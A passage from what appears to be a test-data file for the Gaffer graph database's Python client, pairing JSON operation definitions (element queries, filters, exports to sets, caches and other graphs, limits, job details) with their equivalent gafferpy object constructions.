"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "otherGafferRestApiGraphId",
"storeProperties" : {
"gaffer.host" : "localhost",
"gaffer.context-root" : "/rest/v1",
"gaffer.store.class" : "uk.gov.gchq.gaffer.proxystore.ProxyStore",
"gaffer.port" : "8081",
"gaffer.store.properties.class" : "uk.gov.gchq.gaffer.proxystore.ProxyProperties"
}
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
group="edge"
)
]
)
),
g.ExportToOtherGraph(
graph_id="otherGafferRestApiGraphId",
store_properties={'gaffer.context-root': '/rest/v1',
'gaffer.store.class': 'uk.gov.gchq.gaffer.proxystore.ProxyStore',
'gaffer.host': 'localhost',
'gaffer.store.properties.class': 'uk.gov.gchq.gaffer.proxystore.ProxyProperties',
'gaffer.port': '8081'}
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "exportGraphId"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
)
),
g.ExportToOtherGraph(
graph_id="exportGraphId"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : { }
},
"entities" : { }
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.export.graph.ExportToOtherGraph",
"graphId" : "newGraphId",
"parentSchemaIds" : [ "exportSchemaId" ],
"parentStorePropertiesId" : "exportStorePropertiesId"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge"
)
],
entities=[
]
)
),
g.ExportToOtherGraph(
parent_schema_ids=[
"exportSchemaId"
],
graph_id="newGraphId",
parent_store_properties_id="exportStorePropertiesId"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"start" : 0
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(),
g.DiscardOutput(),
g.GetSetExport(
start=0
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"start" : 2,
"end" : 4
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(),
g.DiscardOutput(),
g.GetSetExport(
end=4,
start=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet",
"key" : "entities"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.GetExports",
"getExports" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"key" : "edges",
"start" : 0
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"key" : "entities",
"start" : 0
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(
key="edges"
),
g.DiscardOutput(),
g.GetAllElements(),
g.ExportToSet(
key="entities"
),
g.DiscardOutput(),
g.GetExports(
get_exports=[
g.GetSetExport(
start=0,
key="edges"
),
g.GetSetExport(
start=0,
key="entities"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.generate.GenerateElements",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator"
},
"input" : [ "1,1", "1,2,1" ]
}
''',
g.GenerateElements(
element_generator=g.ElementGenerator(
fields={},
class_name="uk.gov.gchq.gaffer.doc.operation.generator.ElementGenerator"
),
input=[
"1,1",
"1,2,1"
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.generate.GenerateElements",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObjectGenerator"
},
"input" : [ {
"class" : "uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObject1",
"a" : 1,
"c" : 1
}, {
"class" : "uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObject2",
"a" : 1,
"b" : 2,
"c" : 1
} ]
}
''',
g.GenerateElements(
element_generator=g.ElementGenerator(
class_name="uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObjectGenerator",
fields={}
),
input=[
{'c': 1,
'class': 'uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObject1',
'a': 1},
{'b': 2, 'c': 1,
'class': 'uk.gov.gchq.gaffer.doc.operation.GenerateElementsExample$DomainObject2',
'a': 1}
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.generate.GenerateObjects",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.generator.ObjectGenerator"
},
"input" : [ {
"group" : "entity",
"vertex" : 6,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Entity"
}, {
"group" : "edge",
"source" : 5,
"destination" : 6,
"directed" : true,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Edge"
} ]
}
''',
g.GenerateObjects(
input=[
g.Entity(
properties={'count': 1},
vertex=6,
group="entity"
),
g.Edge(
directed=True,
source=5,
properties={'count': 1},
group="edge",
destination=6
)
],
element_generator=g.ElementGenerator(
fields={},
class_name="uk.gov.gchq.gaffer.doc.operation.generator.ObjectGenerator"
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.generate.GenerateObjects",
"elementGenerator" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.GenerateObjectsExample$DomainObjectGenerator"
},
"input" : [ {
"group" : "entity",
"vertex" : 6,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Entity"
}, {
"group" : "edge",
"source" : 5,
"destination" : 6,
"directed" : true,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Edge"
} ]
}
''',
g.GenerateObjects(
element_generator=g.ElementGenerator(
class_name="uk.gov.gchq.gaffer.doc.operation.GenerateObjectsExample$DomainObjectGenerator",
fields={}
),
input=[
g.Entity(
properties={'count': 1},
vertex=6,
group="entity"
),
g.Edge(
directed=True,
group="edge",
properties={'count': 1},
source=5,
destination=6
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetAdjacentIds(
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetAdjacentIds(
input=[
g.EntitySeed(
vertex=2
)
],
include_incoming_out_going="OUTGOING"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
},
"entities" : { }
},
"includeIncomingOutGoing" : "OUTGOING",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetAdjacentIds(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(
value=1,
or_equal_to=False
)
)
],
group="edge"
)
]
),
input=[
g.EntitySeed(
vertex=2
)
],
include_incoming_out_going="OUTGOING"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}
''',
g.GetAllElements()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 2
},
"selection" : [ "count" ]
} ]
}
},
"entities" : {
"entity" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 2
},
"selection" : [ "count" ]
} ]
}
}
}
}
''',
g.GetAllElements(
view=g.View(
entities=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=2,
or_equal_to=False)
)
],
group="entity"
)
],
edges=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=2,
or_equal_to=False)
)
],
group="edge"
)
]
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetAllJobDetails"
}
''',
g.GetAllJobDetails()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"source" : 2,
"destination" : 3,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ],
"seedMatching": "EQUAL"
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
),
g.EdgeSeed(
directed_type="EITHER",
source=2,
destination=3,
matched_vertex="SOURCE"
)
],
seed_matching=g.SeedMatchingType.EQUAL
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}],
"view": {
"allEdges": true,
"allEntities": true
}
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
],
view=g.View(
all_edges=True,
all_entities=True
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}],
"view": {
"allEdges": true
}
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
],
view=g.View(
all_edges=True,
all_entities=False
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}],
"view": {
"allEntities": true
}
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
],
view=g.View(
all_entities=True
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
},
"entities" : {
"entity" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
}
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"source" : 2,
"destination" : 3,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge",
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=1,
or_equal_to=False)
)
]
)
],
entities=[
g.ElementDefinition(
group="entity",
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=1,
or_equal_to=False)
)
]
)
]
),
input=[
g.EntitySeed(
vertex=2
),
g.EdgeSeed(
source=2,
matched_vertex="SOURCE",
directed_type="EITHER",
destination=3
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"source" : 1,
"destination" : 2,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ]
}
''',
g.GetElements(
input=[
g.EdgeSeed(
source=1,
directed_type="EITHER",
matched_vertex="SOURCE",
destination=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
},
"entities" : {
"entity" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 1
},
"selection" : [ "count" ]
} ]
}
}
},
"input" : [ {
"source" : 1,
"destination" : 2,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="edge",
pre_aggregation_filter_functions=[
g.PredicateContext(
predicate=g.IsMoreThan(
value=1,
or_equal_to=False
),
selection=[
"count"
]
)
]
)
],
entities=[
g.ElementDefinition(
group="entity",
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.IsMoreThan(value=1,
or_equal_to=False)
)
]
)
]
),
input=[
g.EdgeSeed(
matched_vertex="SOURCE",
source=1,
directed_type="EITHER",
destination=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : { },
"entities" : {
"entity" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.Or",
"predicates" : [ {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"orEqualTo" : false,
"value" : 2
}, {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 5
} ]
},
"selection" : [ "count" ]
} ]
}
}
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"source" : 2,
"destination" : 3,
"directedType" : "EITHER",
"matchedVertex" : "SOURCE",
"class" : "uk.gov.gchq.gaffer.operation.data.EdgeSeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
],
entities=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"count"
],
predicate=g.Or(
predicates=[
g.IsLessThan(
or_equal_to=False,
value=2
),
g.IsMoreThan(
or_equal_to=False,
value=5
)
]
)
)
],
group="entity"
)
]
),
input=[
g.EntitySeed(
vertex=2
),
g.EdgeSeed(
directed_type="EITHER",
matched_vertex="SOURCE",
source=2,
destination=3
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"preAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.Or",
"predicates" : [ {
"class" : "uk.gov.gchq.koryphe.tuple.predicate.IntegerTupleAdaptedPredicate",
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"orEqualTo" : false,
"value" : 2
},
"selection" : [ 0 ]
}, {
"class" : "uk.gov.gchq.koryphe.tuple.predicate.IntegerTupleAdaptedPredicate",
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"orEqualTo" : false,
"value" : 3
},
"selection" : [ 1 ]
} ]
},
"selection" : [ "SOURCE", "DESTINATION" ]
} ]
}
},
"entities" : { }
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
pre_aggregation_filter_functions=[
g.PredicateContext(
predicate=g.Or(
predicates=[
g.NestedPredicate(
predicate=g.IsLessThan(
or_equal_to=False,
value=2
),
selection=[
0
]
),
g.NestedPredicate(
predicate=g.IsMoreThan(
or_equal_to=False,
value=3
),
selection=[
1
]
)
]
),
selection=[
"SOURCE",
"DESTINATION"
]
)
],
group="edge"
)
],
entities=[
]
),
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"properties" : [ "vertex|count" ],
"transientProperties" : {
"vertex|count" : "java.lang.String"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.koryphe.impl.function.Concat",
"separator" : "|"
},
"selection" : [ "SOURCE", "count" ],
"projection" : [ "vertex|count" ]
} ]
}
},
"entities" : { }
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
transform_functions=[
g.FunctionContext(
projection=[
"vertex|count"
],
function=g.Concat(separator='|'),
selection=[
"SOURCE",
"count"
]
)
],
group="edge",
properties=[
"vertex|count"
],
transient_properties={
'vertex|count': 'java.lang.String'}
)
],
entities=[
]
),
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"excludeProperties" : [ "count" ],
"transientProperties" : {
"vertex|count" : "java.lang.String"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.koryphe.impl.function.Concat",
"separator" : "|"
},
"selection" : [ "SOURCE", "count" ],
"projection" : [ "vertex|count" ]
} ]
}
},
"entities" : { }
},
"input" : [ {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}
''',
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
exclude_properties=[
"count"
],
transient_properties={
'vertex|count': 'java.lang.String'},
transform_functions=[
g.FunctionContext(
selection=[
"SOURCE",
"count"
],
function=g.Concat(separator='|'),
projection=[
"vertex|count"
]
)
],
group="edge"
)
]
),
input=[
g.EntitySeed(
vertex=2
)
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetFromEndpoint",
"endpoint": "http://mydata.io"
}
''',
g.GetFromEndpoint(endpoint="http://mydata.io")
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "ALL"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(),
g.DiscardOutput(),
g.GetGafferResultCacheExport(
key="ALL"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobDetails"
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(),
g.DiscardOutput(),
g.GetJobDetails()
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"jobId" : "675c6d4a-fba0-410b-8b84-6b40d0415555",
"key" : "ALL"
} ]
}
''',
g.OperationChain(
operations=[
g.GetGafferResultCacheExport(
key="ALL",
job_id="675c6d4a-fba0-410b-8b84-6b40d0415555"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.ExportToGafferResultCache",
"key" : "entities"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.GetExports",
"getExports" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.resultcache.GetGafferResultCacheExport",
"key" : "entities"
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToGafferResultCache(
key="edges"
),
g.DiscardOutput(),
g.GetAllElements(),
g.ExportToGafferResultCache(
key="entities"
),
g.DiscardOutput(),
g.GetExports(
get_exports=[
g.GetGafferResultCacheExport(
key="edges"
),
g.GetGafferResultCacheExport(
key="entities"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobDetails",
"jobId" : "18be2a20-5f36-4598-b522-1efc409b6b39"
}
''',
g.GetJobDetails(
job_id="18be2a20-5f36-4598-b522-1efc409b6b39"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.job.GetJobResults",
"jobId" : "92932856-be96-41b3-85d8-bba7b6886284"
}
''',
g.GetJobResults(
job_id="92932856-be96-41b3-85d8-bba7b6886284"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"start" : 0
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(),
g.DiscardOutput(),
g.GetSetExport(
start=0
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"start" : 2,
"end" : 4
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(),
g.DiscardOutput(),
g.GetSetExport(
start=2,
end=4
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet",
"key" : "edges"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.ExportToSet",
"key" : "entities"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.DiscardOutput"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.GetExports",
"getExports" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"key" : "edges",
"start" : 0
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.export.set.GetSetExport",
"key" : "entities",
"start" : 0
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.ExportToSet(
key="edges"
),
g.DiscardOutput(),
g.GetAllElements(),
g.ExportToSet(
key="entities"
),
g.DiscardOutput(),
g.GetExports(
get_exports=[
g.GetSetExport(
start=0,
key="edges"
),
g.GetSetExport(
start=0,
key="entities"
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.Limit(
truncate=True,
result_limit=3
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : false
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.Limit(
truncate=False,
result_limit=3
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
} ]
}
''',
g.OperationChain(
operations=[
g.GetAllElements(),
g.Limit(
result_limit=3,
truncate=True
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Max",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
} ]
} ]
}
''',
g.OperationChain(
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=1
),
g.EntitySeed(
vertex=2
)
]
),
g.Max(
comparators=[
g.ElementPropertyComparator(
groups=[
"entity",
"edge"
],
property="count",
reversed=False
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"edge" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "DESTINATION", "count" ],
"projection" : [ "score" ]
} ]
}
},
"entities" : {
"entity" : {
"transientProperties" : {
"score" : "java.lang.Integer"
},
"transformFunctions" : [ {
"function" : {
"class" : "uk.gov.gchq.gaffer.doc.operation.function.ExampleScoreFunction"
},
"selection" : [ "VERTEX", "count" ],
"projection" : [ "score" ]
} ]
}
}
},
"input" : [ {
"vertex" : 1,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
}, {
"vertex" : 2,
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.compare.Max",
"comparators" : [ {
"class" : "uk.gov.gchq.gaffer.data.element.comparison.ElementPropertyComparator",
"property" : "count",
"groups" : [ "entity", "edge" ],
"reversed" : false
}, {
